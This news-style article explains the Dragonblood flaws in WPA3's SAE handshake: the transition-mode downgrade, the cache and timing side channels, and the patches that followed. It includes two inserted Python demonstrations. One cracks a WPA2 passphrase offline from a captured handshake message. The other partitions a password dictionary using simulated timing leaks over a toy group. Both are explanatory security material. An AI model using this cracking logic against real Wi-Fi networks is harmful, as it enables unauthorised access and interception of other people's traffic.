Security researchers have discovered a new set of vulnerabilities in the WPA3 protocol, named "Dragonblood", which allow an attacker within range of a WPA3-enabled Wi-Fi network to recover the Wi-Fi password.

Once the password has been recovered, an attacker can join the network and intercept traffic that was supposed to be protected, exposing sensitive information such as credit card numbers, passwords, chat messages and e-mails. This makes it a serious vulnerability.

So What Is Dragonblood?

The Wi-Fi Alliance recently announced the WPA3 protocol, claiming that its Dragonfly handshake (standardised as SAE, Simultaneous Authentication of Equals) makes it infeasible for an attacker to recover the network password by offline guessing.

Most networks still use the 14-year-old WPA2 protocol, which is vulnerable to the KRACK attack. WPA3 was announced as a security upgrade for both personal and enterprise Wi-Fi networks.

For those who don't know, these attacks resemble ordinary dictionary attacks, combined with the abuse of cache- and timing-based side-channel leaks. "This allows an adversary to impersonate any user, and thereby access the Wi-Fi network, without knowing the user's password," the researchers said.

The researchers concluded that, although WPA3 is an improvement over WPA2, it does not meet the standards expected of a modern security protocol, and that further improvements are needed to secure our Wi-Fi networks.

The paper identifies five major vulnerabilities. First, the researchers show that SAE's anti-clogging mechanism can be bypassed to cause a denial of service.

"In particular, a resource-constrained device can overload the CPU of a professional access point by abusing the overhead of SAE's defenses against previously known side channels."

Design Flaws In WPA3: The Dragonblood Vulnerabilities

Two classes of design flaws were discovered in the WPA3 protocol, and both can be abused by an attacker to recover the password of the target Wi-Fi network:

  1. Downgrade attacks
  2. Side-channel leaks

Because a WPA3 network in transition mode supports both WPA2 and WPA3 with the same password, an attacker can set up a rogue access point that only supports WPA2, force the client into a WPA2 4-way handshake, and then run an offline dictionary attack against the captured handshake messages.

The researchers said: "Even if the client detects the downgrade to WPA2 during the 4-way handshake, it's too late. The 4-way handshake messages that were exchanged before the downgrade was detected are enough to launch an offline dictionary attack."
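To make concrete why the first two handshake messages are enough, here is an added Python example (written for this page; it is not code from the article or from the Dragonblood researchers) that simulates the WPA2-Personal 4-way handshake key derivation and then runs an offline dictionary attack using only the ANonce the rogue AP chose in message 1 and the SNonce and MIC the client returned in message 2. The SSID, MAC addresses, nonces, wordlist and passphrase are constructed for the demonstration; the EAPOL-Key frame is simplified but keeps the real field offsets that the MIC computation depends on.

```python
import hashlib
import hmac

MIC_OFFSET = 81    # 16-byte Key MIC: 4-byte EAPOL header + 77 bytes of descriptor fields
NONCE_OFFSET = 17  # 32-byte Key Nonce field


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512 built from HMAC-SHA1 (key descriptor version 2)."""
    out = b""
    for i in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def derive_kck(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """First 16 bytes of the PTK: the Key Confirmation Key that authenticates the handshake."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC: HMAC-SHA1 over the EAPOL-Key frame with the MIC field zeroed, truncated to 128 bits."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_message2(snonce: bytes, key_data: bytes) -> bytes:
    """Simplified EAPOL-Key message 2 with the 802.11 field layout and a blank MIC."""
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: pairwise, MIC, descriptor version 2
            + b"\x00\x10"                # key length
            + b"\x00" * 7 + b"\x01"      # replay counter
            + snonce                     # key nonce (SNonce)
            + b"\x00" * 16               # key IV
            + b"\x00" * 8                # key RSC
            + b"\x00" * 8                # key ID
            + b"\x00" * 16               # key MIC, filled in by the client
            + len(key_data).to_bytes(2, "big") + key_data)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL version 2, type EAPOL-Key


def client_message2(passphrase, ssid, aa, spa, anonce, snonce, key_data) -> bytes:
    """What a downgraded client sends after message 1: its SNonce plus a MIC under the KCK."""
    kck = derive_kck(derive_pmk(passphrase, ssid), aa, spa, anonce, snonce)
    frame = build_message2(snonce, key_data)
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def offline_dictionary_attack(ssid, aa, spa, anonce, msg2, wordlist):
    """The rogue AP's view: it chose ANonce itself and captured message 2; it never needed the password."""
    snonce = msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    observed = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_kck(derive_pmk(candidate, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, msg2), observed):
            return candidate
    return None


# Constructed demonstration values (not captured from any real network).
SSID = "HomeNet"
AA = bytes.fromhex("00112233aabb")    # rogue AP's MAC (Authenticator Address)
SPA = bytes.fromhex("66778899ccdd")   # victim client's MAC (Supplicant Address)
ANONCE = hashlib.sha256(b"rogue-ap-anonce").digest()
SNONCE = hashlib.sha256(b"client-snonce").digest()
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020c00")  # WPA2-PSK/CCMP RSN element
WORDLIST = ["password", "letmein1", "sunflower", "sunflower42", "qwertyuiop"]


def demo(passphrase: str = "sunflower42"):
    """Simulate the victim answering message 1, then crack its message 2 with the wordlist."""
    msg2 = client_message2(passphrase, SSID, AA, SPA, ANONCE, SNONCE, RSN_IE)
    return offline_dictionary_attack(SSID, AA, SPA, ANONCE, msg2, WORDLIST)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The rogue AP never has to complete the handshake: message 3 (where a client would notice the RSN element no longer advertises WPA3) is never sent, yet the MIC on message 2 already commits the client to its PMK, so every candidate passphrase can be checked offline at PBKDF2 speed.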

The second flaw, side-channel leaks in the Dragonfly handshake's password-encoding algorithm, enables two attacks: a cache-based side-channel attack and a timing-based side-channel attack.

The cache-based side-channel attack (CVE-2019-9494) requires the attacker to run unprivileged code on the victim's machine. It reveals which branch was taken in the first iteration of Dragonfly's password-generation algorithm, which in turn leaks information about the password.

The timing-based side-channel attack (also tracked as CVE-2019-9494) abuses the fact that the execution time of the Dragonfly password-encoding algorithm depends on the password when certain MODP groups are used. Both leaks feed a password partitioning attack, which resembles an offline dictionary attack: each leaked piece of information rules out a part of the candidate passwords.

The two researchers who discovered these vulnerabilities, Mathy Vanhoef (NYUAD) and Eyal Ronen (Tel Aviv University & KU Leuven), have released scripts to test for specific vulnerabilities in the WPA3 protocol:

  • Dragonslayer: Implements attacks against EAP-pwd (to be released soon).
  • Dragondrain: Tests to what extent an access point is vulnerable to denial-of-service attacks against the SAE handshake.
  • Dragontime: An experimental tool for performing timing attacks against the SAE handshake when MODP group 22, 23 or 24 is used. Note that most WPA3 implementations do not enable these groups by default.
  • Dragonforce: An experimental tool that takes the information recovered by the timing- or cache-based attacks and performs a password partitioning attack. This is similar to a dictionary attack.
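As an added example covering the side-channel attacks described above and the Dragonforce password-partitioning step (illustrative code written for this page, not the researchers' tools), the Python block below implements the MODP variant of Dragonfly's hunting-and-pecking password derivation over a deliberately tiny, constructed group, so that the number of iterations the algorithm needs varies with the password and the MAC addresses the way it does in MODP groups 22 to 24. The attacker side spoofs several client MAC addresses, records the iteration count each handshake leaked (what a timing measurement gives you), and keeps only the dictionary entries consistent with every observation. The group parameters, MAC addresses, dictionary and hash choices are assumptions made for the demonstration.

```python
import hashlib
import hmac

# Constructed toy MODP group, NOT a real SAE group: p is a 10-bit prime and the
# subgroup order q = 5 divides p - 1.  Two things make the iteration count vary:
# a len(p)-bit KDF output is >= p about half the time and is rejected, and a
# value that maps to 1 (outside the order-q subgroup) is rejected as well.
# Groups 22/23/24 have the same structure with 1024/2048-bit p and a small q.
P = 541
Q = 5
P_BITS = P.bit_length()  # 10


def hunting_and_pecking(password: bytes, mac_a: bytes, mac_b: bytes) -> int:
    """Dragonfly MODP password-element derivation; returns the iteration at which
    a valid element is first found.  That count is what a timing side channel leaks."""
    addrs = max(mac_a, mac_b) + min(mac_a, mac_b)
    counter = 1
    while True:
        # pwd-seed = H(MAX(addr1, addr2) || MIN(addr1, addr2), password || counter)
        # (a 2-byte counter is used here so the toy loop can never overflow)
        pwd_seed = hmac.new(addrs, password + counter.to_bytes(2, "big"), hashlib.sha256).digest()
        # pwd-value = KDF(pwd-seed, "SAE Hunting and Pecking", len(p)) as an integer
        kdf = hmac.new(pwd_seed, b"SAE Hunting and Pecking", hashlib.sha256).digest()
        pwd_value = int.from_bytes(kdf, "big") >> (256 - P_BITS)
        if pwd_value < P:
            pwe = pow(pwd_value, (P - 1) // Q, P)   # map into the order-q subgroup
            if pwe > 1:
                return counter
        counter += 1


def victim_timings(password: bytes, ap_mac: bytes, spoofed_macs):
    """Attacker measurements: one handshake per spoofed client MAC, each leaking the
    iteration count through the AP's response time (simulated directly here)."""
    return {mac: hunting_and_pecking(password, ap_mac, mac) for mac in spoofed_macs}


def partition_dictionary(dictionary, ap_mac: bytes, measurements: dict):
    """Dragonforce-style partitioning: a candidate survives only if it reproduces
    every observed iteration count for the corresponding MAC pair."""
    survivors = list(dictionary)
    for mac, observed in measurements.items():
        survivors = [pw for pw in survivors
                     if hunting_and_pecking(pw, ap_mac, mac) == observed]
    return survivors


# Constructed demonstration data.
AP_MAC = bytes.fromhex("0a1b2c3d4e5f")
VICTIM_PASSWORD = b"correct-horse-battery"
DICTIONARY = [f"password{i}".encode() for i in range(60)] + [VICTIM_PASSWORD]
SPOOFED_MACS = [bytes.fromhex("0200000000") + bytes([i]) for i in range(8)]


def demo(num_measurements: int = 8):
    """Attack with the first num_measurements spoofed MACs; returns the surviving candidates."""
    measurements = victim_timings(VICTIM_PASSWORD, AP_MAC, SPOOFED_MACS[:num_measurements])
    return partition_dictionary(DICTIONARY, AP_MAC, measurements)


if __name__ == "__main__":
    for n in (1, 2, 4, 8):
        print(f"{n} measurement(s): {len(demo(n))} of {len(DICTIONARY)} candidates remain")
```

In this toy group two unrelated passwords agree on the iteration count roughly a quarter of the time, so each spoofed MAC address discards about three quarters of the remaining candidates and a handful of measurements isolates the password. The real attack needs more handshakes because it observes noisy response times rather than exact counts, and the cache-based variant substitutes "did the first iteration succeed?" for the full count while partitioning in the same way.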

Security Patches Already Being Deployed By Device Manufacturers

The researchers conclude the paper "Dragonblood: A Security Analysis of WPA3's SAE Handshake" by saying that "a more open process would have prevented (or clarified) the possibility of a downgrade attack against WPA3 transition mode."

"These issues can be mitigated without affecting devices' ability to work well together," the Wi-Fi Alliance's press release states.

"There is no evidence that these vulnerabilities have been exploited," it adds, and "the affected device manufacturers have already implemented patches to resolve the problem."

In addition, Vanhoef and Ronen worked with the Wi-Fi Alliance and CERT/CC to notify all vendors affected by the WPA3 vulnerabilities so that they could implement countermeasures.